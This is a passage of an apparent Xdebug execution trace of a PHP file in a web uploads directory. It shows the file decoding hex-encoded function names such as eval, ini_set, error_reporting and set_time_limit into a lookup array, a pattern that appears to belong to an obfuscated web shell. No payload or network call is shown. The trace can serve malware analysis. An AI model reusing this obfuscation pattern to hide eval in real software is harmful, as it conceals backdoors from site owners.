2		A						/var/www/html/uploads/index.php	177	$i += 2
3	878	0	0.032427	584696	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	878	1	0.032439	584744
3	878	R			101
3	879	0	0.032451	584664	chr	0		/var/www/html/uploads/index.php	178	1	101
3	879	1	0.032463	584704
3	879	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	880	0	0.032493	584696	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	880	1	0.032505	584744
3	880	R			116
3	881	0	0.032518	584664	chr	0		/var/www/html/uploads/index.php	178	1	116
3	881	1	0.032529	584704
3	881	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	867	1	0.032559	584664
2	867	R			'ini_set'
1		A						/var/www/html/uploads/index.php	8	$func[43] = 'ini_set'
1		A						/var/www/html/uploads/index.php	7	$i++
2	882	0	0.032593	584664	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 7
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	883	0	0.032634	584696	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	883	1	0.032646	584744
3	883	R			102
3	884	0	0.032658	584664	chr	0		/var/www/html/uploads/index.php	178	1	102
3	884	1	0.032670	584704
3	884	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	885	0	0.032701	584728	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	885	1	0.032712	584776
3	885	R			105
3	886	0	0.032725	584696	chr	0		/var/www/html/uploads/index.php	178	1	105
3	886	1	0.032736	584736
3	886	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	887	0	0.032767	584728	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	887	1	0.032779	584776
3	887	R			108
3	888	0	0.032791	584696	chr	0		/var/www/html/uploads/index.php	178	1	108
3	888	1	0.032803	584736
3	888	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	889	0	0.032834	584728	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	889	1	0.032846	584776
3	889	R			101
3	890	0	0.032858	584696	chr	0		/var/www/html/uploads/index.php	178	1	101
3	890	1	0.032872	584736
3	890	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	882	1	0.032903	584696
2	882	R			'file'
1		A						/var/www/html/uploads/index.php	8	$func[44] = 'file'
1		A						/var/www/html/uploads/index.php	7	$i++
2	891	0	0.032937	584696	dehex	1		/var/www/html/uploads/index.php	8	1	'7374725f7265706c616365'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 21
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	892	0	0.032978	584728	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	892	1	0.032990	584776
3	892	R			115
3	893	0	0.033003	584696	chr	0		/var/www/html/uploads/index.php	178	1	115
3	893	1	0.033015	584736
3	893	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	894	0	0.033055	584760	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	894	1	0.033067	584808
3	894	R			116
3	895	0	0.033079	584728	chr	0		/var/www/html/uploads/index.php	178	1	116
3	895	1	0.033091	584768
3	895	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	896	0	0.033121	584760	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	896	1	0.033133	584808
3	896	R			114
3	897	0	0.033145	584728	chr	0		/var/www/html/uploads/index.php	178	1	114
3	897	1	0.033157	584768
3	897	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	898	0	0.033225	584760	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	898	1	0.033238	584808
3	898	R			95
3	899	0	0.033251	584728	chr	0		/var/www/html/uploads/index.php	178	1	95
3	899	1	0.033262	584768
3	899	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	900	0	0.033293	584760	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	900	1	0.033305	584808
3	900	R			114
3	901	0	0.033318	584728	chr	0		/var/www/html/uploads/index.php	178	1	114
3	901	1	0.033329	584768
3	901	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	902	0	0.033360	584760	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	902	1	0.033372	584808
3	902	R			101
3	903	0	0.033384	584728	chr	0		/var/www/html/uploads/index.php	178	1	101
3	903	1	0.033395	584768
3	903	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	904	0	0.033426	584760	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	904	1	0.033437	584808
3	904	R			112
3	905	0	0.033450	584728	chr	0		/var/www/html/uploads/index.php	178	1	112
3	905	1	0.033461	584768
3	905	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	906	0	0.033491	584760	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	906	1	0.033503	584808
3	906	R			108
3	907	0	0.033516	584728	chr	0		/var/www/html/uploads/index.php	178	1	108
3	907	1	0.033527	584768
3	907	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	908	0	0.033557	584768	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	908	1	0.033569	584816
3	908	R			97
3	909	0	0.033581	584736	chr	0		/var/www/html/uploads/index.php	178	1	97
3	909	1	0.033592	584776
3	909	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	910	0	0.033623	584768	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	910	1	0.033635	584816
3	910	R			99
3	911	0	0.033652	584736	chr	0		/var/www/html/uploads/index.php	178	1	99
3	911	1	0.033663	584776
3	911	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	912	0	0.033694	584768	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	912	1	0.033706	584816
3	912	R			101
3	913	0	0.033718	584736	chr	0		/var/www/html/uploads/index.php	178	1	101
3	913	1	0.033729	584776
3	913	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	891	1	0.033760	584736
2	891	R			'str_replace'
1		A						/var/www/html/uploads/index.php	8	$func[45] = 'str_replace'
1		A						/var/www/html/uploads/index.php	7	$i++
2	914	0	0.033795	584736	dehex	1		/var/www/html/uploads/index.php	8	1	'6578706c6f6465'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 13
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	915	0	0.033836	584768	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	915	1	0.033848	584816
3	915	R			101
3	916	0	0.033861	584736	chr	0		/var/www/html/uploads/index.php	178	1	101
3	916	1	0.033873	584776
3	916	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	917	0	0.033903	584800	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	917	1	0.033915	584848
3	917	R			120
3	918	0	0.033928	584768	chr	0		/var/www/html/uploads/index.php	178	1	120
3	918	1	0.033939	584808
3	918	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	919	0	0.033970	584800	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	919	1	0.033981	584848
3	919	R			112
3	920	0	0.033994	584768	chr	0		/var/www/html/uploads/index.php	178	1	112
3	920	1	0.034006	584808
3	920	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	921	0	0.034036	584800	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	921	1	0.034048	584848
3	921	R			108
3	922	0	0.034061	584768	chr	0		/var/www/html/uploads/index.php	178	1	108
3	922	1	0.034072	584808
3	922	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	923	0	0.034103	584800	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	923	1	0.034114	584848
3	923	R			111
3	924	0	0.034127	584768	chr	0		/var/www/html/uploads/index.php	178	1	111
3	924	1	0.034138	584808
3	924	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	925	0	0.034169	584800	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	925	1	0.034181	584848
3	925	R			100
3	926	0	0.034193	584768	chr	0		/var/www/html/uploads/index.php	178	1	100
3	926	1	0.034204	584808
3	926	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	927	0	0.034235	584800	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	927	1	0.034247	584848
3	927	R			101
3	928	0	0.034259	584768	chr	0		/var/www/html/uploads/index.php	178	1	101
3	928	1	0.034271	584808
3	928	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	914	1	0.034301	584768
2	914	R			'explode'
1		A						/var/www/html/uploads/index.php	8	$func[46] = 'explode'
1		A						/var/www/html/uploads/index.php	7	$i++
2	929	0	0.034335	584768	dehex	1		/var/www/html/uploads/index.php	8	1	'6576616c'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 7
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	930	0	0.034381	584800	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	930	1	0.034394	584848
3	930	R			101
3	931	0	0.034406	584768	chr	0		/var/www/html/uploads/index.php	178	1	101
3	931	1	0.034418	584808
3	931	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	932	0	0.034449	584832	hexdec	0		/var/www/html/uploads/index.php	178	1	'76'
3	932	1	0.034461	584880
3	932	R			118
3	933	0	0.034473	584800	chr	0		/var/www/html/uploads/index.php	178	1	118
3	933	1	0.034485	584840
3	933	R			'v'
2		A						/var/www/html/uploads/index.php	178	$r .= 'v'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	934	0	0.034516	584832	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	934	1	0.034527	584880
3	934	R			97
3	935	0	0.034540	584800	chr	0		/var/www/html/uploads/index.php	178	1	97
3	935	1	0.034551	584840
3	935	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	936	0	0.034582	584832	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	936	1	0.034594	584880
3	936	R			108
3	937	0	0.034606	584800	chr	0		/var/www/html/uploads/index.php	178	1	108
3	937	1	0.034618	584840
3	937	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	929	1	0.034648	584800
2	929	R			'eval'
1		A						/var/www/html/uploads/index.php	8	$func[47] = 'eval'
1		A						/var/www/html/uploads/index.php	7	$i++
2	938	0	0.034681	584800	dehex	1		/var/www/html/uploads/index.php	8	1	'6f625f7374617274'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 15
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	939	0	0.034758	584832	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	939	1	0.034771	584880
3	939	R			111
3	940	0	0.034783	584800	chr	0		/var/www/html/uploads/index.php	178	1	111
3	940	1	0.034795	584840
3	940	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	941	0	0.034826	584864	hexdec	0		/var/www/html/uploads/index.php	178	1	'62'
3	941	1	0.034838	584912
3	941	R			98
3	942	0	0.034851	584832	chr	0		/var/www/html/uploads/index.php	178	1	98
3	942	1	0.034863	584872
3	942	R			'b'
2		A						/var/www/html/uploads/index.php	178	$r .= 'b'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	943	0	0.034893	584864	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	943	1	0.034905	584912
3	943	R			95
3	944	0	0.034918	584832	chr	0		/var/www/html/uploads/index.php	178	1	95
3	944	1	0.034929	584872
3	944	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	945	0	0.034959	584864	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	945	1	0.034971	584912
3	945	R			115
3	946	0	0.034984	584832	chr	0		/var/www/html/uploads/index.php	178	1	115
3	946	1	0.034995	584872
3	946	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	947	0	0.035026	584864	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	947	1	0.035037	584912
3	947	R			116
3	948	0	0.035050	584832	chr	0		/var/www/html/uploads/index.php	178	1	116
3	948	1	0.035061	584872
3	948	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	949	0	0.035091	584864	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	949	1	0.035103	584912
3	949	R			97
3	950	0	0.035115	584832	chr	0		/var/www/html/uploads/index.php	178	1	97
3	950	1	0.035127	584872
3	950	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	951	0	0.035162	584864	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	951	1	0.035174	584912
3	951	R			114
3	952	0	0.035186	584832	chr	0		/var/www/html/uploads/index.php	178	1	114
3	952	1	0.035198	584872
3	952	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	953	0	0.035228	584864	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	953	1	0.035240	584912
3	953	R			116
3	954	0	0.035252	584832	chr	0		/var/www/html/uploads/index.php	178	1	116
3	954	1	0.035264	584872
3	954	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	938	1	0.035294	584840
2	938	R			'ob_start'
1		A						/var/www/html/uploads/index.php	8	$func[48] = 'ob_start'
1		A						/var/www/html/uploads/index.php	7	$i++
2	955	0	0.035329	584840	dehex	1		/var/www/html/uploads/index.php	8	1	'66756e6374696f6e5f657869737473'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 29
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	956	0	0.035372	584872	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	956	1	0.035384	584920
3	956	R			102
3	957	0	0.035397	584840	chr	0		/var/www/html/uploads/index.php	178	1	102
3	957	1	0.035408	584880
3	957	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	958	0	0.035440	584904	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	958	1	0.035452	584952
3	958	R			117
3	959	0	0.035465	584872	chr	0		/var/www/html/uploads/index.php	178	1	117
3	959	1	0.035477	584912
3	959	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	960	0	0.035507	584904	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	960	1	0.035519	584952
3	960	R			110
3	961	0	0.035532	584872	chr	0		/var/www/html/uploads/index.php	178	1	110
3	961	1	0.035544	584912
3	961	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	962	0	0.035574	584904	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	962	1	0.035586	584952
3	962	R			99
3	963	0	0.035598	584872	chr	0		/var/www/html/uploads/index.php	178	1	99
3	963	1	0.035610	584912
3	963	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	964	0	0.035640	584904	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	964	1	0.035652	584952
3	964	R			116
3	965	0	0.035664	584872	chr	0		/var/www/html/uploads/index.php	178	1	116
3	965	1	0.035676	584912
3	965	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	966	0	0.035706	584904	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	966	1	0.035718	584952
3	966	R			105
3	967	0	0.035731	584872	chr	0		/var/www/html/uploads/index.php	178	1	105
3	967	1	0.035742	584912
3	967	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	968	0	0.035772	584904	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	968	1	0.035784	584952
3	968	R			111
3	969	0	0.035797	584872	chr	0		/var/www/html/uploads/index.php	178	1	111
3	969	1	0.035809	584912
3	969	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	970	0	0.035839	584904	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	970	1	0.035851	584952
3	970	R			110
3	971	0	0.035863	584872	chr	0		/var/www/html/uploads/index.php	178	1	110
3	971	1	0.035875	584912
3	971	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	972	0	0.035909	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	972	1	0.035921	584960
3	972	R			95
3	973	0	0.035933	584880	chr	0		/var/www/html/uploads/index.php	178	1	95
3	973	1	0.035945	584920
3	973	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	974	0	0.035975	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	974	1	0.035987	584960
3	974	R			101
3	975	0	0.036000	584880	chr	0		/var/www/html/uploads/index.php	178	1	101
3	975	1	0.036011	584920
3	975	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	976	0	0.036042	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	976	1	0.036054	584960
3	976	R			120
3	977	0	0.036067	584880	chr	0		/var/www/html/uploads/index.php	178	1	120
3	977	1	0.036078	584920
3	977	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	978	0	0.036108	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	978	1	0.036120	584960
3	978	R			105
3	979	0	0.036133	584880	chr	0		/var/www/html/uploads/index.php	178	1	105
3	979	1	0.036145	584920
3	979	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	980	0	0.036176	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	980	1	0.036188	584960
3	980	R			115
3	981	0	0.036201	584880	chr	0		/var/www/html/uploads/index.php	178	1	115
3	981	1	0.036213	584920
3	981	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	982	0	0.036244	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	982	1	0.036256	584960
3	982	R			116
3	983	0	0.036268	584880	chr	0		/var/www/html/uploads/index.php	178	1	116
3	983	1	0.036279	584920
3	983	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	984	0	0.036309	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	984	1	0.036321	584960
3	984	R			115
3	985	0	0.036334	584880	chr	0		/var/www/html/uploads/index.php	178	1	115
3	985	1	0.036346	584920
3	985	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	955	1	0.036376	584880
2	955	R			'function_exists'
1		A						/var/www/html/uploads/index.php	8	$func[49] = 'function_exists'
1		A						/var/www/html/uploads/index.php	7	$i++
2	986	0	0.036411	584880	dehex	1		/var/www/html/uploads/index.php	8	1	'6572726f725f7265706f7274696e67'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 29
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	987	0	0.036453	584912	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	987	1	0.036465	584960
3	987	R			101
3	988	0	0.036477	584880	chr	0		/var/www/html/uploads/index.php	178	1	101
3	988	1	0.036489	584920
3	988	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	989	0	0.036520	584944	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	989	1	0.036532	584992
3	989	R			114
3	990	0	0.036544	584912	chr	0		/var/www/html/uploads/index.php	178	1	114
3	990	1	0.036556	584952
3	990	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	991	0	0.036586	584944	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	991	1	0.036598	584992
3	991	R			114
3	992	0	0.036611	584912	chr	0		/var/www/html/uploads/index.php	178	1	114
3	992	1	0.036629	584952
3	992	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	993	0	0.036660	584944	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	993	1	0.036672	584992
3	993	R			111
3	994	0	0.036684	584912	chr	0		/var/www/html/uploads/index.php	178	1	111
3	994	1	0.036696	584952
3	994	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	995	0	0.036726	584944	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	995	1	0.036738	584992
3	995	R			114
3	996	0	0.036750	584912	chr	0		/var/www/html/uploads/index.php	178	1	114
3	996	1	0.036762	584952
3	996	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	997	0	0.036792	584944	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	997	1	0.036805	584992
3	997	R			95
3	998	0	0.036817	584912	chr	0		/var/www/html/uploads/index.php	178	1	95
3	998	1	0.036829	584952
3	998	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	999	0	0.036860	584944	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	999	1	0.036872	584992
3	999	R			114
3	1000	0	0.036884	584912	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1000	1	0.036896	584952
3	1000	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1001	0	0.036926	584944	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1001	1	0.036938	584992
3	1001	R			101
3	1002	0	0.036950	584912	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1002	1	0.036962	584952
3	1002	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1003	0	0.036992	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	1003	1	0.037004	585000
3	1003	R			112
3	1004	0	0.037016	584920	chr	0		/var/www/html/uploads/index.php	178	1	112
3	1004	1	0.037027	584960
3	1004	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1005	0	0.037064	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	1005	1	0.037077	585000
3	1005	R			111
3	1006	0	0.037089	584920	chr	0		/var/www/html/uploads/index.php	178	1	111
3	1006	1	0.037100	584960
3	1006	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1007	0	0.037131	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1007	1	0.037143	585000
3	1007	R			114
3	1008	0	0.037155	584920	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1008	1	0.037167	584960
3	1008	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1009	0	0.037213	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1009	1	0.037226	585000
3	1009	R			116
3	1010	0	0.037238	584920	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1010	1	0.037249	584960
3	1010	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1011	0	0.037280	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1011	1	0.037292	585000
3	1011	R			105
3	1012	0	0.037305	584920	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1012	1	0.037316	584960
3	1012	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1013	0	0.037347	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1013	1	0.037358	585000
3	1013	R			110
3	1014	0	0.037371	584920	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1014	1	0.037387	584960
3	1014	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1015	0	0.037417	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1015	1	0.037429	585000
3	1015	R			103
3	1016	0	0.037442	584920	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1016	1	0.037454	584960
3	1016	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	986	1	0.037484	584920
2	986	R			'error_reporting'
1		A						/var/www/html/uploads/index.php	8	$func[50] = 'error_reporting'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1017	0	0.037519	584920	dehex	1		/var/www/html/uploads/index.php	8	1	'7365745f74696d655f6c696d6974'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 27
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1018	0	0.037562	584952	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1018	1	0.037573	585000
3	1018	R			115
3	1019	0	0.037586	584920	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1019	1	0.037597	584960
3	1019	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1020	0	0.037628	584984	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1020	1	0.037640	585032
3	1020	R			101
3	1021	0	0.037653	584952	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1021	1	0.037664	584992
3	1021	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1022	0	0.037695	584984	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1022	1	0.037707	585032
3	1022	R			116
3	1023	0	0.037719	584952	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1023	1	0.037731	584992
3	1023	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1024	0	0.037760	584984	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1024	1	0.037772	585032
3	1024	R			95
3	1025	0	0.037785	584952	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1025	1	0.037796	584992
3	1025	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1026	0	0.037827	584984	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1026	1	0.037839	585032
3	1026	R			116
